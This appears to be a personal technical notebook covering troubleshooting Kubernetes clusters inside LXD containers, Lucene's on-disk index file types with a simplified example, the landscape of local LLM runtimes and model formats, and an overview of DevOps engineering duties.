    [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
      SystemdCgroup = true

  [plugins.cri.containerd.default_runtime]
    runtime_type = "io.containerd.runc.v2"
    runtime_engine = ""
    runtime_root = ""

Try 2: Weird problem

I have a weird problem now, When setting up a cluster with kubeadm, the containers keep restarting until everything crashes. The same thing with microk8s.

A weirder situation is that K0s works fine!

Hypothesis

There is something related to container technologies that's preventing the containers from running properly.

In the case of Kubeadm, the kubernetes components run in containers (containerd in my case).
In the case of Microk8s, the components run on top of snapd (to be verified).

--> In this case there should be something preventing them (containers, snaps) from running properly.

Where k8s components run

To verify this I will do the following experiments

Run k3s in LXD, since it uses containerd to run the k8s components, it should fail
Install kubernetes the hard way, this way I'll install the components as processes not as containers. In this case Everything should work fine.

Edit: Microk8s works fine, the problem was related to the dns plugin which was disabled for some reason. The reason for which Microk8s reports a not running status. microk8s enable dns and everything is working fine.

Kubeadm downgrade

Downgraded kubeadm from 1.22.0 to 1.20.4 and everything seems to work fine!

Can be a version problem! Digging deeper and maybe getting some help from serverfault.

A new problem arose: kube-proxy won't start and fails with open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

The solution was to set nf_conntrack_max in the host.

sudo sysctl net/netfilter/nf_conntrack_max=131072

Managed to upgrade from 1.20.4 to 1.21.4 to 1.22.1 and the cluster is running almost fine, until they aren't.

For 1.21.4 everything was fine while in 1.22.1 nothing works.

It started with some CrashLoopBackOffs and now everything is down.

When I restart the kubelet, the containers start to show off a minute later, and then enter the crash loop again.

My Hypothesis is that this is a version issue, there is something wrong with v1.22 or with my lxd setup or both. To test that I am doing the following

Testing v1.22 using k3s or some other distribution.
Testing v1.22 with k8s the hard way.

Also v1.22 supports swap so maybe the problem has something to do with swap. I'll check that too:

Asked at k8s.slack.com and the responses suggested that the etcd server is the reason why everything fail and said that from kubernetes 1.21 to 1.22 etcd moved to 3.5.0

The best way and the least time consuming is Kubernetes the hard way since, it will help me in other thing as well. Ans since k8s distro haven't moved to 1.22 yet.

https://github.com/inercia/terraform-provider-kubeadm
Use Ansible + Terraform is better maybe

Try 3: New cluster

Going back to this project. This works on 1.31+ with a little bit of tweaking. It may work with previous versions, I have not tested them. Initialized a cluster on a 3 machines LXD container instances.

Created 3 LXD container instances using LXD terraform provider and cloud-init

It is weird that LXD cloud images for ubuntu/jammy do not come with sshd installed. So I had to install it manually.

Getting the annoying error

285 fs.go:595] Unable to get btrfs mountpoint IDs: stat failed on /dev/nvme0n1p3 with error: no such file or directory` error. But apparently it does not affect the cluster health. See Above for more information about the issue.

After initializing the cluster, the kube-proxy pod enter a CrashLoop state. A kubectl logs show that the container was failing with:

conntrack.go:100] Set sysctl 'net/netfilter/nf_conntrack_max' to 131072
server.go:495] open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

Apparently kube-proxy is trying to change the value of nf_conntrack_max even if it does not have the permission to do so. This is maybe related to the way LXC loads the kernel modules (Need to dig more on this).

root@k8s-node-0:~# sysctl -p
sysctl: setting key "net.netfilter.nf_conntrack_max": No such file or directory
sysctl: cannot stat /proc/sys/net/nf_conntrack_max: No such file or directory

The solution was to prevent kube-proxy from changing the nf_conntrack_max value by setting maxPerCore to 0 in the kube-proxy configMap. More

Installed Weaveworks network plugin.

kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s.yaml

Sample code: kubernetes · main · iduoad / Agora / Projects / Azourki · GitLab

References

sysbox/docs/quickstart/kind.md at master · nestybox/sysbox: Running kubernetes in Sysbox containers.

ElasticSearch

Introduction to Lucene

Ingestion Process

Document Creation: User creates a Document object in memory. Data model: Map-like structure with Field objects (e.g., TextField for searchable text, StoredField for retrievable data). Stored in RAM as Java objects.
Analysis (Tokenization & Filtering): Tokenize (split into words), Normalize (lowercase, remove stopwords, stem words like "running" → "run").
Term Addition to Index: the terms are added to the index in Memoru
Segment Flushing: When buffer fills. data is flushed to disk as a new immutable segment
Commit & Merging: On commit, segments are merged (background) into larger ones for efficiency

Index Data model

Data model

ls -1 | cut -f2 -d. |sort | uniq
doc
dvd
dvm
fdm
fdt
fdx
fnm
lock
nvd
nvm
pos
segments_4
si
tim
tip
tmd

The most important files are tim, tip, doc and pos. The full model is the following

Vocabulary:
- .tim: Terms Dictionary with All unique terms (words)
- .tip: Terms Index Pointer/index into .tim
- .doc: Postings - Frequencies
- .pos: Postings - Positions
Stored Fields (Original Document Storage)
- .fdt: Field Data - Actual stored field values (like a database)
- .fdx: Field Index - Pointers to data in .fdt
- .fdm: Field Metadata - Compression info (Describes field types, analyzers, norms, etc.)
Doc Values (Column-oriented Storage)
- .dvd: Doc Values Data - For sorting/faceting
- .dvm: Doc Values Metadata
Norms (Field Length Normalization)
- .nvd: Norms Data - Field length info for scoring
- .nvm: Norms Metadata
Metadata Files
- .fnm: Field Names - Maps field IDs to names.
- .si: Segment Info - Segment metadata (doc count, codec, version, deleted docs, etc.).
- .tmd: Term Vector Metadata - For term vector storage. (Extra info for .tim and .tip.)
- segments_4: Master file listing all segments (Lists all segments, their versions, and commit metadata.)
- write.lock: Write lock (prevents concurrent writes)

Example

The document

# Document
0, "Hello World", "Lucene stores documents efficiently"
1, "Apache Lucene", "Lucene uses segments to store data"
2, "Search Engines", "Elasticsearch is built on Lucene"

Metadata files

# .fnm
0: title (indexed=true, stored=true, hasTermVectors=false)
1: body (indexed=true, stored=false, hasNorms=true)

# .tmd: Term Metadata, stores extra metadata about terms (field-level summaries, term stats, checksums).
Field "title": 3 unique terms
Field "body": 6 unique terms
checksum: 0xA32F9C

# .si: Segment Info, describes the whole segment.
Segment name: _2
Lucene version: 9.0
Doc count: 3
Deleted docs: 0
Files: [_2.fdt, _2.fdx, _2.tim, _2.tip, ...]

# segments_4: Commit point, global file listing all segments that make up the index.
Segments:
  _2 (3 docs)
  _3 (7 docs)
  _4 (2 docs)
Generation: 4

# write.lock
hostname=localhost
processId=12345

Stored fields

# .fdt: Documents and their stored field 
Doc 0:
  title = "Hello World"
Doc 1:
  title = "Apache Lucene"
Doc 2:
  title = "Search Engines"

# .fdx: offsets for each Doc to help lucene to seek inside .fdt
Doc 0 offset: 0
Doc 1 offset: 34
Doc 2 offset: 71

# .fdm: metadata about how fields are stored and indexed
Field "title":
  type: text
  analyzer: standard
  norms: no
Field "body":
  type: text
  analyzer: standard
  norms: yes

Dictionary files

# .tim: Term dictionary for indexed fields
Term Dictionary:
  body: [
    "built" -> docFreq=1, totalTermFreq=1
    "data" -> docFreq=1, totalTermFreq=1
    "elasticsearch" -> docFreq=1, totalTermFreq=1
    "lucene" -> docFreq=2, totalTermFreq=2
    "segments" -> docFreq=1, totalTermFreq=1
    "stores" -> docFreq=1, totalTermFreq=1
  ]
  title: [
    "apache" -> docFreq=1
    "hello" -> docFreq=1
    "search" -> docFreq=1
  ]

# .tip: Pointers for terms in .tim file (for fast seek)
Pointers:
  "apache" → offset 0
  "lucene" → offset 128
  "search" → offset 192

# .doc: Postings (docIDs), lists which documents contain each term. 
Term: "lucene"
  → docIDs = [1, 2]
Term: "search"
  → docIDs = [2]
Term: "hello"
  → docIDs = [0]

# .pos: Positions, word positions within documents (for phrase queries, proximity).
Term: "lucene"
  Doc 1: positions [0]
  Doc 2: positions [4]

Doc values (Columnar values)

# .dvd columnar storage for sorting, faceting, analytics.
Field "popularity" (numeric doc values)
Doc 0: 10
Doc 1: 25
Doc 2: 5

# .dvm: contains metadata (like offsets, encodings).
Field count: 2
Field 0: popularity (numeric)
  offset: 0x00000010
  encoding: delta-compressed int
Field 1: category (sorted)
  offset: 0x00000100
  encoding: terms dictionary

Norms

# .nvd per-field normalization factors (used in scoring).
Field: body
Doc 0: norm=0.577
Doc 1: norm=0.707
Doc 2: norm=0.5

# .nvm: norms metadata.
Field count: 1
Field 0: body (norms)
  offset: 0x00000000
  encoding: byte
  numDocs: 3

Field Settings

Each field in a lucene document has the following boolean separate settings:

indexed: The field is searchable (terms go into the inverted index).
stored: The field’s original value is saved so it can be retrieved with the document.
docValues: The field’s value is stored in columnar form for sorting, faceting, etc.

Norms

Norms are small numeric factors Lucene computes per field, per document to help with relevance scoring.

They typically encode things like:

How long the field is (shorter fields often get a boost),
Whether it contains many terms,
Field-level boosts applied at indexing time.

These are used when computing the TF-IDF or BM25 score that determines how relevant a document is to a query.

Doc values

Doc values are Lucene’s columnar data store — think of them like a per-field database column.

They’re designed for:

Sorting: e.g., sort search results by “price” or “date”
Faceting: e.g., count how many documents per “category”
Analytics: e.g., compute averages, histograms, or aggregations

Index operations

Deletions

The deletes are soft, each segment has bitset for each doc. 0 is set to set the doc for deletion.

On Segment merge, the segments with higher deleted docs are prioritized.

Updates

Updating a previously indexed document is a “cheap” delete followed by a re-insertion of the document. Updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing values in a Lucene index is probably not a good idea – there is no in-place update of values.

References

LLMs

Running LLMs

Timeline:

Inception

Sept 2022: Georgi Gerganov initiated the GGML (Georgi Gerganov Machine Learning) library as a C library implementing tensor algebra with strict memory management and multi-threading capabilities. This foundation would become crucial for efficient CPU-based inference.
Mar 2023: llama.cpp built on top of GGML with pure C/C++ with no dependencies. -> LLM execution on standard hardware without GPU requirements.
Jun 2023: Ollama Docker-like tool for AI models, simplifying the process of pulling, running, and managing local LLMs through familiar container-style commands. It became the easiest entry point for users wanting to experiment with local models.

Standardization

Aug 2023: GGUF format (GGML Universal Format) successor to GGML format. GGUF provided an extensible, future-proof format storing comprehensive model metadata and supporting significantly improved tokenization code.
2024: Multiple tools
- vLLM emerged as a high-throughput inference server optimized for serving multiple users
- GPT4All developed into a comprehensive desktop application with over 250,000 monthly active users
- LM Studio became a popular cross-platform desktop client for model management

The flow

Building the model

Model is built and trained used PyTorch, Tensorflow, Jax or another framework
The frameworks outputs the model weights:
- JAX/Flax: msgpack checkpoints (flax_model.msgpack) + config.json
- Tf/Keras: SavedModel directory (saved_model.pb + variables/) or HDF5 file (model.h5)
- PyTorch: .pt or .pth saved with torch.save(model.state_dict(), "model.pt")
- ONNX (Open Neural Network Exchange) a cross-framework intermediate format used to transfer models, it has a ONNX runtime which can run it
The models can be converted to Hugging Face model formats
- pytorch_model.bin or model.safetensors → the weights (can be multiple shards if big).
- config.json → architecture hyperparameters (hidden size, number of layers, etc.).
- tokenizer.json, tokenizer.model, special_tokens_map.json, etc. → tokenizer files.
- generation_config.json → default generation params.

model.safetensors is a safe, zero-copy serialization format for tensors. Alternative to PyTorch’s pickle-based .bin (which can execute arbitrary code on load — unsafe). And supports other frameworks like TF and Jax. And it is convertible to GGUF and other formats and can be run by vLLM natively.

Running the models (vLLM vs llama.cpp)

vLLM: Runs the model in HF format (Inference). It can start a inference server with OpenAI-compatible API
The model can be converted further (compiled into) to TensorRT which is NVIDIA’s inference optimization runtime (For all DL models). It takes a model in any format (PyTorch, ONNX) and compiles it into a TensorRT engine .plan file highly optimized for Nvidia GPUs. (This is used if we are targeting Nvidia GPUs)

vLLM doesn’t use TensorRT by default (it uses its own kernel tricks), but you could use TensorRT separately.

In Apple Silicon the model can be converted using MLX to use the Integrated Memory. MLX optimized the model for inference in Apple Silicon (quantization for example)
Convert the model from HF format to GGUF format (Quantization).
Run the GGUF on llama.cpp on CPU and low resource hardware.

Running the models as a user

Create a Modelfile to package the model a la Dockerfile.

FROM ./model-q4_k_m.gguf
PARAMETER temperature 0.7
TEMPLATE """{{ .Prompt }}"""

Build the model ollama create mymodel -f Modelfile and run it ollama run mymodel.
We can push/pull the model.
While ollama is developer friendly/focused, there are other tools geared towards end users like gpt4all and LM studio (GUI first, marketplace, builtin chat ui ...)
Common AI Model Formats

Running Local LLMs

Prerequisites

CUDA: Application programming interface for Nvidia GPUs
AMD ROCm is an open software stack including drivers, development tools, and APIs that enable GPU programming from low-level kernel to end-user applications.
Intel OneApi: Same but has a different goal, trying to standardize computation over CPU and GPUs and FPGAs ...

Inference Engines

google/gemma.cpp: lightweight, standalone C++ inference engine for Google's Gemma models.

Serving Frameworks

These are serving frameworks in the sense that they do the entire thing including compression, deployment, Serving, memory management, Caching ... While the previous category only runs the model on the hardware (with some optimization but not a fully fledged framework). -LMDeploy: it is also a solution for running LLMs (Inference).

Dev Oriented

Ollama: Uses docker like concepts to manage and run models
LocalAI:
- It supports a lot of backends including llama.cpp, vllm, and hf transformers ...
- It support Hardware acceleration on various models.
- If I can say it is the most complete but it feels cumbersome.
- It support a declarative way to define models.
- It is container first. Run with container images | LocalAI
mozilla-ai/llamafile: 1 executable file models (it relies on llama.cpp)

Containers

Ramalama:
- Supports multiple transports (ollama:// hf:// and oci:// and ModelScope://)
- ramalama support 3 runtimes: ollama.cpp, vllm and mlx.
- It starts a container image with everything needed to run the model including optimizations. On run ramalama detects the GPU information and decides which image to use.
Docker:
- Same but the ai models are not standard OCI images, which make them not pull-able from ramalama
- Docker has introduced ability to run MCP servers.

GUIs

GPT4All: uses LLama.cpp as a backend
LM Studio: used LLama.cpp as a backend and supports MLX on Apple silicon.
menloresearch/jan: Jan is an open source alternative to ChatGPT that runs 100% offline on your computer

tools

DevOps Guide

DevOps engineering

"DevOps Engineer"" is a highly relative job title. Purists will tell you the term makes no sense because DevOps is a methodology, not a person. Yet, you will find thousands of job listings, each defining the role differently.

In many cases, these positions are simply rebranded Operations engineers or SysAdmin roles equipped with modern tooling. However, the actual scope of a DevOps Engineer varies widely and typically entails one or more of the following tasks:

Build: Core Infrastructure & Operations
- Provisioning and maintaining resources, whether on-premise or in the cloud.
- System Administration: Installing, patching, and maintaining OS-level components (Linux/Windows). This includes managing users, permissions, and filesystems.
- Configuration Management: Automating the setup and maintenance of software configurations across servers.
- Networking & Storage: Managing software-defined networking (VPCs, subnets) and storage volumes.
- Operations Management: Handling routine maintenance, backups, and general system health.
- Database Management: Basic provisioning, replication setup, and ensuring data persistence.
Design: Architecture & Design
- System Design: Architecting solutions based on needs, e.g. choosing between loosely coupled (microservices) or tightly coupled (monoliths) structures.
- High Availability & Scalability Strategy: Designing systems to withstand traffic spikes (auto-scaling) and regional failures (redundancy).
- Cloud Architecture: eciding which managed services (Serverless, Managed SQL, Object Storage) to use versus building from scratch.
automate: Automation & Tooling
- Automation: Replacing manual UI interactions with reproducible code.
- Scripting & Middleware Development: Writing scripts to connect tools that don't natively talk to each other.
- Infrastructure as Code (IaC): Defining the entire environment in configuration files rather than manual setup.
Release Engineering & Software Supply Chain
- Software Supply Chain Management: Managing dependencies, auditing libraries for safety, and generating Software Bill of Materials (SBOM).
- Deployment Strategy (e.g., Weekly Deployment): Executing releases using strategies like "Blue/Green" swaps or "Canary" releases to limit the blast radius of errors.
- Version Control Management: Enforcing branching strategies (e.g., GitFlow vs. Trunk-Based) to keep code organized.
- Artifact Management: Securing compiled binaries and container images in private registries.
Operate: Reliability & Incident Management (SRE)
- Monitoring & Observability: Setting up dashboards to track metrics (CPU, latency), logs (errors), and traces (user journey).
- Incident Response: Acting as the first responder during outages to triage and coordinate fixes.
- Post-Incident Review (Post-Mortems): Writing Root Cause Analysis (RCA) reports after incidents to prevent recurrence.
- Chaos Engineering: Stress-testing systems by intentionally breaking components to ensure recovery automation works.
Help: Developer Experience (DevEx)
- Developer Environment Building: Creating pre-configured environments (e.g., DevContainers) so new hires can code on Day 1 without setup friction.
- Internal Developer Platform (IDP): Building self-service portals where developers can provision their own resources without blocking Ops.
- Documentation & Knowledge Base: Maintaining runbooks and wikis to prevent "brain drain" when engineers leave.
Protect: Security & Governance (DevSecOps)
- Security & Compliance: Ensuring infrastructure meets legal standards (GDPR, HIPAA, PCI-DSS) and internal policies.
- Identity & Access Management (IAM): Enforcing "Least Privilege" to ensure developers don't have unnecessary "God mode" access to production.
- Vulnerability Scanning: Automating security checks for both infrastructure (OS patches) and application code (libraries).
Collaborate: Culture & People
- Team Support: Acting as a technical unblocker for development teams.
- Coaching: Providing DevOps coaching to teams to instill cultural best practices.
- FinOps: Monitoring cloud costs and guiding teams toward architecting cost-effective solutions.

Fundamentals

Networking

Networking tutorial by Ben Eater: Very nice and short tutorial on how networks work from physical layer to TCP/IP.
Software Networking and Interfaces on Linux: Very nice tutorial about Linux Interfaces.
- Part 1
- Part 2

Storage

2 Types of M.2 SSDs: SATA and NVMe: Kingston made a very good series of article and videos about SSDs in their blog. The blog has some very good content.

Keyboard shortcuts

M'Goun